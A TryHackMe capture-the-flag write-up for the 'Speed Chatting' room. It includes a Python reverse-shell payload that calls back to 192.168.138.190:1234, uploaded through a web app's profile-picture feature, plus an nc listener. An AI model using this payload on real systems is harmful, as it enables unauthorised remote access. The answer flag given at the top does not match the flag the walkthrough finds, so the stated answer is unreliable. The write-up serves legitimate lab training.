DEATHESTHER
← All write-ups

TRYHACKME WRITE-UP

Speed Chatting - TryHackMe writeup

Can you hack as fast as you can chat?

EasyWeb3 min read

Open the room on TryHackMe ↗ View on GitHub

Task 1. Speed Chat

What is the flag?

THM{v4l3nt1n3_jwt_c00k13_t4mp3r_4dm1n_sh0p}

Accessing the Website

I started the room and noticed that most of the basic enumeration had already been taken care of. This allowed me to move quickly toward interacting with the application itself instead of spending time on discovery.

image

The target application was exposed on port 5000, so I accessed it directly through the browser.

Navigating the Web Application

Once the page loaded, I explored the available functionality. One of the first things that stood out was a profile picture upload feature, which looked like a potential entry point for interaction.

image

While interacting with the application, I observed that messages were being handled through an API. This indicated that there was backend communication happening that might be useful later.

image

I then inspected the HTTP response headers and identified the server details:

Server: Werkzeug/3.1.5 Python/3.10.12
image

This confirmed that the application was running on a Python-based backend using Werkzeug.

image

Exploitation

To test for possible code execution through the upload functionality, I crafted a simple Python reverse shell.

cat << 'EOF' > test.py
import os
os.system("bash -c 'bash -i >& /dev/tcp/192.168.138.190/1234 0>&1'")
EOF

Before uploading the file, I set up a listener on my machine to catch the incoming connection.

nc -lnvp 1234

After uploading the payload, I received a reverse shell connection successfully.

image

Flag

With shell access established, I checked my privileges and confirmed that I was running as root. From there, I navigated through the system to locate the flag.

image
THM{R3v3rs3_Sh3ll_L0v3_C0nn3ct10ns}
image

This room was a fast-paced challenge that focused on quick interaction and exploitation. The flow from identifying functionality to gaining shell access was straightforward but required attention to detail.